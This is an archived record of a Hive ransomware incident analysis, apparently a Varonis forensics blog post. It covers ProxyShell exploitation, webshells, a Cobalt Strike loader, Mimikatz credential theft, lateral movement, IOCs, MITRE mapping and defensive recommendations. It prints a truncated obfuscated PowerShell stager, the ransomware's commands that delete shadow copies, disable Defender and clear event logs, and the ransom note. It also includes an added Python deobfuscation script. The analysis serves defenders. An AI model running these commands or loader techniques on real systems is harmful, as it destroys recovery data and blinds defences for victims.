{
	"id": "6c6784b3-1e52-4d11-8039-39c75c2a347c",
	"created_at": "2026-04-06T00:15:21.582381Z",
	"updated_at": "2026-04-10T13:12:33.864787Z",
	"deleted_at": null,
	"sha1_hash": "4b321b7cb2737f25e28463a39d15fa8681b1b66a",
	"title": "Hive Ransomware Analysis",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1768348,
	"plain_text": "Hive Ransomware Analysis\r\nBy Nadav Ovadia\r\nPublished: 2022-04-19 · Archived: 2026-04-05 16:43:21 UTC\r\n×\r\nName MD5 SHA1\r\nWindows.exe    \r\nMimikatz.exe 6c9ad4e67032301a61a9897377d9cff8 655979d56e874fbe7561bb1b6e512316c25cbb\r\nadvanced_port_scanner_2.5.3869.exe 6a58b52b184715583cda792b56a0a1ed 3477a173e2c1005a81d042802ab0f22cc12a4d5\r\nadvanced port scanner.exe 4fdabe571b66ceec3448939bfb3ffcd1 763499b37aacd317e7d2f512872f9ed719aacae\r\nscan.exe bb7c575e798ff5243b5014777253635d 2146f04728fe93c393a74331b76799ea8fe0269\r\np.bat 5e1575c221f8826ce55ac2696cf1cf0b ecf794599c5a813f31f0468aecd5662c5029b5c4\r\nWebshell #1 d46104947d8478030e8bcfcc74f2aef7 d1ef9f484f10d12345c41d6b9fca8ee0efa29b60\r\nWebshell #2 2401f681b4722965f82a3d8199a134ed 2aee699780f06857bb0fb9c0f73e33d1ac87a38\r\n×\r\nName MD5 SHA1\r\nWindows.exe    \r\nMimikatz.exe 6c9ad4e67032301a61a9897377d9cff8 655979d56e874fbe7561bb1b6e512316c25cbb\r\nadvanced_port_scanner_2.5.3869.exe 6a58b52b184715583cda792b56a0a1ed 3477a173e2c1005a81d042802ab0f22cc12a4d5\r\nadvanced port scanner.exe 4fdabe571b66ceec3448939bfb3ffcd1 763499b37aacd317e7d2f512872f9ed719aacae\r\nscan.exe bb7c575e798ff5243b5014777253635d 2146f04728fe93c393a74331b76799ea8fe0269\r\np.bat 5e1575c221f8826ce55ac2696cf1cf0b ecf794599c5a813f31f0468aecd5662c5029b5c4\r\nWebshell #1 d46104947d8478030e8bcfcc74f2aef7 d1ef9f484f10d12345c41d6b9fca8ee0efa29b60\r\nWebshell #2 2401f681b4722965f82a3d8199a134ed 2aee699780f06857bb0fb9c0f73e33d1ac87a38\r\n×\r\nName MD5 SHA1\r\nWindows.exe    \r\nMimikatz.exe 6c9ad4e67032301a61a9897377d9cff8 655979d56e874fbe7561bb1b6e512316c25cbb\r\nadvanced_port_scanner_2.5.3869.exe 6a58b52b184715583cda792b56a0a1ed 3477a173e2c1005a81d042802ab0f22cc12a4d5\r\nhttps://www.varonis.com/blog/hive-ransomware-analysis\r\nPage 1 of 13\n\nadvanced port scanner.exe 4fdabe571b66ceec3448939bfb3ffcd1 763499b37aacd317e7d2f512872f9ed719aacae\r\nscan.exe bb7c575e798ff5243b5014777253635d 
2146f04728fe93c393a74331b76799ea8fe0269\r\np.bat 5e1575c221f8826ce55ac2696cf1cf0b ecf794599c5a813f31f0468aecd5662c5029b5c4\r\nWebshell #1 d46104947d8478030e8bcfcc74f2aef7 d1ef9f484f10d12345c41d6b9fca8ee0efa29b60\r\nWebshell #2 2401f681b4722965f82a3d8199a134ed 2aee699780f06857bb0fb9c0f73e33d1ac87a38\r\nDuring a recent engagement with a customer, the Varonis Forensics Team investigated a ransomware incident. Multiple\r\ndevices and file servers were compromised and encrypted by a malicious threat group known as Hive.\r\nFirst observed in June 2021, Hive is an affiliate-based ransomware variant used by cybercriminals to conduct ransomware\r\nattacks against healthcare facilities, nonprofits, retailers, energy providers, and other sectors worldwide. Hive is built for\r\ndistribution in a Ransomware-as-a-service model that enables affiliates to utilize it as desired.\r\nThe variant uses common ransomware tactics, techniques, and procedures (TTPs) to compromise victims' devices. While\r\ntaking live actions, the operator disables anti-malware protections and then exfiltrates sensitive data and encrypts business\r\nfiles. Their affiliates use multiple mechanisms to compromise their victims' networks, including phishing emails with\r\nmalicious attachments, leaked VPN credentials, and by exploiting vulnerabilities on external-facing assets. In addition, Hive\r\nplaces a plain-text ransom note that threatens to publish the victim's data on the TOR website 'HiveLeaks' unless the victim\r\nmeets the attacker's conditions.\r\nhttps://www.varonis.com/blog/hive-ransomware-analysis\r\nPage 2 of 13\n\nObservation of the attack\r\nThe Forensics team observed that the actor managed to achieve its malicious goals and encrypt the environment in less than\r\n72 hours from the initial compromise.\r\nStage 1: ProxyShell and WebShell\r\nFirst, the attacker exploited multiple Exchange security vulnerabilities, referred to as ProxyShell. 
Next, the attacker placed a malicious backdoor script (a webshell) in a publicly accessible directory on the Exchange server. Through these web scripts the attacker could then run arbitrary PowerShell on the compromised server with SYSTEM privileges, since the IIS application pools that host Exchange run as LocalSystem.\r\nStage 2: Cobalt Strike\r\nThe malicious PowerShell code downloaded additional stagers from a remote C2 (Command \u0026 Control) server associated with the Cobalt Strike framework. The stagers were not written to the file system but executed in memory.\r\nStage 3: Mimikatz and Pass-The-Hash\r\nLeveraging the SYSTEM permissions, the threat actor created a new administrator account named \"user\" and advanced to the credential dumping stage, invoking Mimikatz. By stealing the domain Administrator NTLM hash, and without needing to crack the password, the operator reused it in a Pass-The-Hash attack and took control of the domain admin account.\r\nStage 4: Scanning for sensitive information\r\nNext, the threat actor performed extensive discovery across the network. In addition to searching for files containing \"password\" in their names, observed activity included dropping network scanners, collecting the network's IP addresses and device names, and then making RDP connections to the backup servers and other critical assets.\r\nStage 5: Ransomware deployment\r\nFinally, a custom-crafted malware payload named Windows.exe was delivered and executed on various devices, leading to wide encryption and denial of access to files within the organization. The payload created a plain-text ransom note during the encryption phase.\r\nInitial Access\r\nThe initial indicator of compromise was the successful exploitation of Microsoft Exchange via the vulnerabilities known as ProxyShell.\r\nPublicly detailed in August 2021, ProxyShell is a remote code execution (RCE) attack chain against Microsoft Exchange Server. 
It chains three separate security flaws and allows a remote attacker to execute arbitrary code on affected installations of Microsoft Exchange Server:\r\nCVE-2021-34473 (Base Score: 9.8): Microsoft Exchange Server Remote Code Execution Vulnerability (pre-authentication path confusion in the Autodiscover front end).\r\nCVE-2021-34523 (Base Score: 9.8): Microsoft Exchange Server Elevation of Privilege Vulnerability (in the Exchange PowerShell backend).\r\nCVE-2021-31207 (Base Score: 7.2): Microsoft Exchange Server Security Feature Bypass Vulnerability (post-authentication arbitrary file write, which is what lands the webshell on disk).\r\nMicrosoft released patches for these three vulnerabilities in April and May 2021 as part of its \"Patch Tuesday\" releases: CVE-2021-34473 and CVE-2021-34523 were fixed by KB5001779 in April 2021, and CVE-2021-31207 by KB5003435 in May 2021. The two April fixes were only assigned CVE identifiers in July 2021, so vulnerability tracking keyed on CVE numbers alone would have flagged them late; the reliable check is the installed Exchange Cumulative Update and Security Update level.\r\nDuring the investigation, we found specific exploitation evidence of these CVEs (Common Vulnerabilities and Exposures), which allowed the adversary to deploy webshells successfully on the compromised server.\r\nBased on our analysis, four different IP addresses accessed the malicious files:\r\n139.60.161.228 (USA), ASN: HOSTKEY. Related activity: Cobalt Strike C2 and Log4j vulnerability scanning.\r\n139.60.161.56 (USA), ASN: HOSTKEY. Related activity: Cobalt Strike C2 and Log4j vulnerability scanning.\r\n185.70.184.8 (Netherlands), ASN: HOSTKEY. Related activity: Cobalt Strike C2 and Log4j vulnerability scanning; associated with Emotet, IcedID, and QBot.\r\n91.208.52.149 (Netherlands), ASN: SERVERIUS-A.\r\nThe malicious files spotted were the two webshells listed as Webshell #1 and Webshell #2 in the IOC table at the end of this post. Their file names are made of random characters with no apparent significance. Attackers commonly do this so that third parties cannot find the webshells simply by requesting a list of file names already known from other campaigns.\r\nThe source code of the deployed webshells is taken from the public git repository https://github.com/ThePacketBender/webshells.\r\nExecution\r\nHaving established a foothold on the compromised Exchange Server, the threat actor executed various PowerShell commands designed to download malicious files from the remote C2 server to the victim's machine. The attackers ran the malware with commands such as Invoke-Expression (IEX), or by downloading the file content directly into memory and executing it from there.\r\nFurther, the attackers executed an additional obfuscated PowerShell script that was part of the Cobalt Strike framework. The Base64-encoded command contains several layers of encoding but finally decodes to the following PowerShell command:\r\nfunction func_get_proc_address {\r\nParam ($var_module, $var_procedure)\r\n$var_unsafe_native_methods = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache\r\n$var_gpa = $var_unsafe_native_methods.GetMethod('GetProcAddress', [Type[]] @('System.Runtime.InteropServices.Hand\r\nreturn $var_gpa.Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServi\r\n}\r\nfunction func_get_delegate_type {\r\nParam (\r\n[Parameter(Position = 0, Mandatory = $True)] [Type[]] $var_parameters,\r\n[Parameter(Position = 1)] [Type] $var_return_type = [Void]\r\n)\r\n$var_type_builder = 
[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('\r\n$var_type_builder.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::S\r\n$var_type_builder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $var_return_type, $var_parameters\r\nreturn $var_type_builder.CreateType()\r\n}\r\n[Byte[]]$var_code = [System.Convert]::FromBase64String('38uqIyMjQ6rGEvFHqHETqHEvqHE3qFELLJRpBRLcEuOPH0JfIQ8D4uwuIuTB03F0qH\r\nfor ($x = 0; $x -lt $var_code.Count; $x++) {\r\n$var_code[$x] = $var_code[$x] -bxor 35\r\n}\r\nWrite-Output $var_code\r\nThe \"for\" loop adds another layer of obfuscation: after the Base64 decode, every byte of the payload is XORed with the key 35 (0x23). The two helper functions are the usual Cobalt Strike PowerShell loader pattern, resolving a Win32 API address through GetProcAddress and building a delegate type so that the decoded bytes can be invoked directly from memory; the version above ends in Write-Output $var_code, which writes the decoded bytes out instead of executing them. Repeating the decode-then-XOR steps ourselves extracted the IP address of the target C2, which, unsurprisingly, turned out to be the same address we found previously.\r\nConverting the Base64 into a hexadecimal string and reformatting it with a Python script restored the malicious file. VirusTotal analysis shows 23 out of 52 antivirus detections and attributes the file to the Cobalt Strike framework.\r\nPersistence\r\nWith the NT AUTHORITY\\SYSTEM privileges obtained, and to maintain persistence on the compromised server, a new account named \"user\" was created and added to the \"Remote Desktop Users\" and \"Administrators\" groups. This account was then used to browse multiple paths looking for \"password\"-related files, to RDP to the backup servers, and more.\r\nCredential Access\r\nThe threat actor used Mimikatz, a post-exploitation tool, specifically the \"logonPasswords\" command of its sekurlsa module, which reads the credential material of logged-on accounts (plaintext passwords where available, NTLM hashes and Kerberos tickets) from LSASS memory; here the results were saved to a text file on the local system. 
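Returning to the Cobalt Strike stager shown under Execution: the following Python script is an added example, not code from the original post or from Varonis. It reverses the loader's two steps (Base64 decode, then XOR every byte with 35) and then pulls printable strings and IPv4 addresses out of the restored payload, which is how the C2 address is recovered, and hashes the result for VirusTotal. The stager bytes are a constructed stand-in for the real payload (whose Base64 is truncated above), and 203.0.113.10 is an RFC 5737 documentation address, not an address from this incident.

```python
import base64
import hashlib
import re

XOR_KEY = 35  # the constant in the stager loop: $var_code[$x] -bxor 35


def deobfuscate(blob: str, key: int = XOR_KEY) -> bytes:
    # Same order as the PowerShell: FromBase64String first, then XOR every byte with the key.
    return bytes(b ^ key for b in base64.b64decode(blob))


def obfuscate(payload: bytes, key: int = XOR_KEY) -> str:
    # Inverse of deobfuscate; used here only to build the sample blob (a single-byte XOR is its own inverse).
    return base64.b64encode(bytes(b ^ key for b in payload)).decode('ascii')


IPV4 = re.compile(rb'(?<![0-9])(?:[0-9]{1,3}[.]){3}[0-9]{1,3}(?![0-9])')


def extract_ipv4(data: bytes) -> list:
    # Dotted quads with every octet in range, de-duplicated in order of appearance.
    found = []
    for raw in IPV4.findall(data):
        text = raw.decode('ascii')
        if all(int(octet) <= 255 for octet in text.split('.')) and text not in found:
            found.append(text)
    return found


def extract_strings(data: bytes, min_len: int = 6) -> list:
    # Runs of printable ASCII, like strings(1); a reverse-HTTP stager carries its User-Agent, URI and host this way.
    return [run.decode('ascii') for run in re.findall(rb'[ -~]{%d,}' % min_len, data)]


def sha256_hex(data: bytes) -> str:
    # Hash of the restored payload: the value to look up on VirusTotal or add to a blocklist.
    return hashlib.sha256(data).hexdigest()


# Constructed sample standing in for the real stager: a few opaque bytes plus NUL-separated strings.
# 203.0.113.10 is a documentation address (RFC 5737), not a C2 observed in this incident.
NUL = bytes.fromhex('00')
SAMPLE_PAYLOAD = (
    bytes.fromhex('fce8890000006089e531d2648b5230') + NUL
    + b'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)' + NUL
    + b'/dpixel' + NUL
    + b'203.0.113.10' + NUL
    + bytes.fromhex('e8cafec0de')
)
SAMPLE_BLOB = obfuscate(SAMPLE_PAYLOAD)  # what the FromBase64String('...') argument looks like

if __name__ == '__main__':
    restored = deobfuscate(SAMPLE_BLOB)
    print('sha256 :', sha256_hex(restored))
    print('hex    :', restored.hex()[:64], '...')
    print('strings:', extract_strings(restored))
    print('ipv4   :', extract_ipv4(restored))
    with open('restored_stager.bin', 'wb') as fh:  # the file you would submit for analysis
        fh.write(restored)
```

Run it as a script to write restored_stager.bin; for a real capture, paste the complete FromBase64String argument in place of SAMPLE_BLOB. Both steps are byte-wise, so the same function handles any stager built from this template with a different single-byte key, and the string and address extraction works on the restored bytes whatever the architecture.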
With the administrator's NTLM hash in hand, the threat actor used the pass-the-hash technique to obtain highly privileged access to other assets in the network, launching a new command prompt on the affected system under the stolen identity. Pass-the-hash works because NTLM authentication proves possession of the hash rather than the password, so no cracking is required.\r\nLateral Movement\r\nLeveraging the stolen domain admin account, the actor made RDP connections using mstsc.exe with the \"/v\" parameter (which names the target host) to multiple devices on the network, mainly looking for the servers associated with network backups and the SQL servers. We strongly believe these actions were performed to confirm access to the critical servers before the ransomware deployment.\r\nDiscovery\r\nA well-known public network scanner, \"SoftPerfect\", was used to scan the domain assets. With it, the threat actor acquired the list of domain devices and saved the results to a text file named \"domains.txt\". To locate all live hosts, the attacker then ran a batch script called \"p.bat\" that looped over the domain list, pinged each entry and saved the results to a text file named \"res.txt\".\r\nThe p.bat script and its file naming convention match part of Conti's ransomware toolkit, which was provided to that group's affiliates and first leaked in August 2021 and published on Twitter. 
This indicates that Hive affiliates are adopting other ransomware groups' techniques.\r\nImpact\r\nThe threat actors began their final actions by distributing a file named \"windows.exe\", the ransomware payload, written in Golang. The payload performs multiple operations before and during encryption, including deleting shadow copies, disabling security products, clearing Windows event logs, and closing handles on files to guarantee a smooth encryption process. Below is a brief documentation of the executed commands:\r\nCommand | Description\r\nvssadmin.exe delete shadows /all /quiet | Deletes the shadow copies from the machine to inhibit system recovery\r\nnet.exe stop \"SamSs\" /y | Stops the Security Accounts Manager service (SamSs), intended to keep security alerts from reaching the SIEM\r\nreg.exe add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\" /v \"DisableAntiSpyware\" /t REG_DWORD /d \"1\" /f | Disables Windows Defender through the policy registry key to avoid detection\r\nwevtutil.exe cl security | Clears the Windows Security event log\r\nEach of these commands is a high-fidelity detection opportunity: none of them is routine activity on a file server, and seeing them in quick succession is a strong ransomware signal.\r\nThe ransomware iterates through all available folders, encrypting the files they contain, and drops a ransom note named \"_HOW_TO_DECRYPT.txt\" in each folder. 
Once it has finished encrypting, it displays the ransom note to inform the user of the attack:\r\nYour network has been breached and all data were encrypted.\r\nPersonal data, financial reports and important documents are ready to disclose.\r\nTo decrypt all the data and to prevent exfiltrated files to be disclosed at\r\nhttp://hiveleakdbtnp76ulyhi52eag6c6tyc3xw7ez7iqy6wc34gd2nekazyd.onion/\r\nyou will need to purchase our decryption software.\r\nPlease contact our sales department at:\r\n http://hivecust6vhekztbqgdnkks64ucehqacge3dij3gyrrpdp57zoq3ooqd.onion/\r\n \r\n Login:\r\n Password:\r\nTo get an access to .onion websites download and install Tor Browser at:\r\n https://www.torproject.org/ (Tor Browser is not related to us)\r\nFollow the guidelines below to avoid losing your data:\r\n - Do not modify, rename or delete *.key. files. Your data will be undecryptable.\r\n - Do not modify or rename encrypted files. You will lose them.\r\n - Do not report to the Police, FBI, etc. They don't care about your business. They simply won't allow you to pay. As a result you will lose everything.\r\n - Do not hire a recovery company. They can't decrypt without the key. They also don't care about your business. They believe that they are good negotiators, but it is not. They usually fail. So speak for yourself.\r\n - Do not reject to purchase. Exfiltrated files will be publicly disclosed.\r\nConclusions\r\nRansomware attacks have grown significantly over the past years and remain the preferred method of threat actors aiming to maximize profits. The impact of an attack can be severe. 
It can harm an organization's reputation, disrupt regular operations and lead to temporary, and possibly permanent, loss of sensitive data.\r\nAlthough detecting and responding to such incidents can be challenging, most of the malicious activity described here could have been prevented by having the right security tools, incident response plans, and patches for known vulnerabilities in place.\r\nRecommendations\r\nThe Varonis Forensics Team recommends the following:\r\n- Patch Exchange Server to the latest Cumulative Update (CU) and Security Update (SU) provided by Microsoft; the ProxyShell fixes used against this victim shipped in the April and May 2021 updates.\r\n- Enforce complex passwords and require users to change passwords periodically.\r\n- Use Microsoft LAPS so that every machine has a unique, regularly rotated local administrator password, remove domain accounts from local Administrators groups (the principle of least privilege), and regularly check for and remove inactive user accounts.\r\n- Disable SMBv1 and require SMB signing. Note that signing defends against NTLM relay rather than pass-the-hash; pass-the-hash is contained by keeping privileged credentials off lower-tier systems, so their hashes never sit in a compromised host's LSASS, and by restricting NTLM use where possible.\r\n- Restrict access to the minimum required for the employee's role.\r\n- Detect and automatically prevent access control changes that violate your business rules.\r\n- Train employees in security principles and make security awareness training part of your cyber security plan.\r\n- Establish basic security practices and set rules of behavior describing how to handle and protect the organization's and customers' information and other vital data.\r\nMITRE Breakdown\r\n1. Initial Access\r\nExploit Public-Facing Application (T1190)\r\nCVE-2021-34473\r\nCVE-2021-34523\r\nCVE-2021-31207\r\n2. Execution\r\nUser Execution (T1204)\r\nMalicious File (T1204.002)\r\nCommand and Scripting Interpreter (T1059)\r\nPowerShell (T1059.001)\r\n3. Persistence\r\nServer Software Component (T1505)\r\nWeb Shell (T1505.003)\r\nCreate Account (T1136)\r\nDomain Account (T1136.002)\r\nValid Accounts (T1078)\r\nDomain Accounts (T1078.002)\r\n4. Privilege Escalation\r\nValid Accounts (T1078)\r\nDomain Accounts (T1078.002)\r\n5. 
Defense Evasion\r\nDeobfuscate/Decode Files or Information (T1140)\r\nIndicator Removal on Host (T1070)\r\nClear Windows Event Logs (T1070.001)\r\nImpair Defenses (T1562)\r\nDisable or Modify Tools (T1562.001)\r\n6. Credential Access\r\nOS Credential Dumping (T1003)\r\nLSASS Memory (T1003.001)\r\n7. Discovery\r\nRemote System Discovery (T1018)\r\n8. Lateral Movement\r\nRemote Services (T1021)\r\nRemote Desktop Protocol (T1021.001)\r\nUse Alternate Authentication Material (T1550)\r\nPass the Hash (T1550.002)\r\n9. Command and Control\r\nApplication Layer Protocol (T1071)\r\nWeb Protocols (T1071.001)\r\n10. Impact\r\nData Encrypted for Impact (T1486)\r\nInhibit System Recovery (T1490)\r\nService Stop (T1489)\r\nIOCs\r\nUser account names created\r\n\"user\"\r\nMalicious IPs\r\n139.60.161.228\r\n139.60.161.56\r\n91.208.52.149\r\n185.70.184.8\r\nFile hashes\r\nName | MD5 | SHA1\r\nWindows.exe | (not listed) | (not listed)\r\nMimikatz.exe | 6c9ad4e67032301a61a9897377d9cff8 | 655979d56e874fbe7561bb1b6e512316c25cbb\r\nadvanced_port_scanner_2.5.3869.exe | 6a58b52b184715583cda792b56a0a1ed | 3477a173e2c1005a81d042802ab0f22cc12a4d5\r\nadvanced port scanner.exe | 4fdabe571b66ceec3448939bfb3ffcd1 | 763499b37aacd317e7d2f512872f9ed719aacae\r\nscan.exe | bb7c575e798ff5243b5014777253635d | 2146f04728fe93c393a74331b76799ea8fe0269\r\np.bat | 5e1575c221f8826ce55ac2696cf1cf0b | ecf794599c5a813f31f0468aecd5662c5029b5c4\r\nWebshell #1 | d46104947d8478030e8bcfcc74f2aef7 | d1ef9f484f10d12345c41d6b9fca8ee0efa29b60\r\nWebshell #2 | 2401f681b4722965f82a3d8199a134ed | 2aee699780f06857bb0fb9c0f73e33d1ac87a38\r\nNote: five of the SHA1 values above (Mimikatz.exe, both Advanced Port Scanner binaries, scan.exe and Webshell #2) are 38 or 39 hex digits rather than the 40 of a full SHA1; verify them against the original post before loading them into a blocklist.\r\nSource: https://www.varonis.com/blog/hive-ransomware-analysis",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.varonis.com/blog/hive-ransomware-analysis"
	],
	"report_names": [
		"hive-ransomware-analysis"
	],
	"threat_actors": [],
	"ts_created_at": 1775434521,
	"ts_updated_at": 1775826753,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/4b321b7cb2737f25e28463a39d15fa8681b1b66a.pdf",
		"text": "https://archive.orkl.eu/4b321b7cb2737f25e28463a39d15fa8681b1b66a.txt",
		"img": "https://archive.orkl.eu/4b321b7cb2737f25e28463a39d15fa8681b1b66a.jpg"
	}
}